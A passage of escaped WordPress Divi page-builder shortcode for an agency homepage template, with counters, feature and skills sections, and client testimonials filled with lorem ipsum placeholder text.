custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial 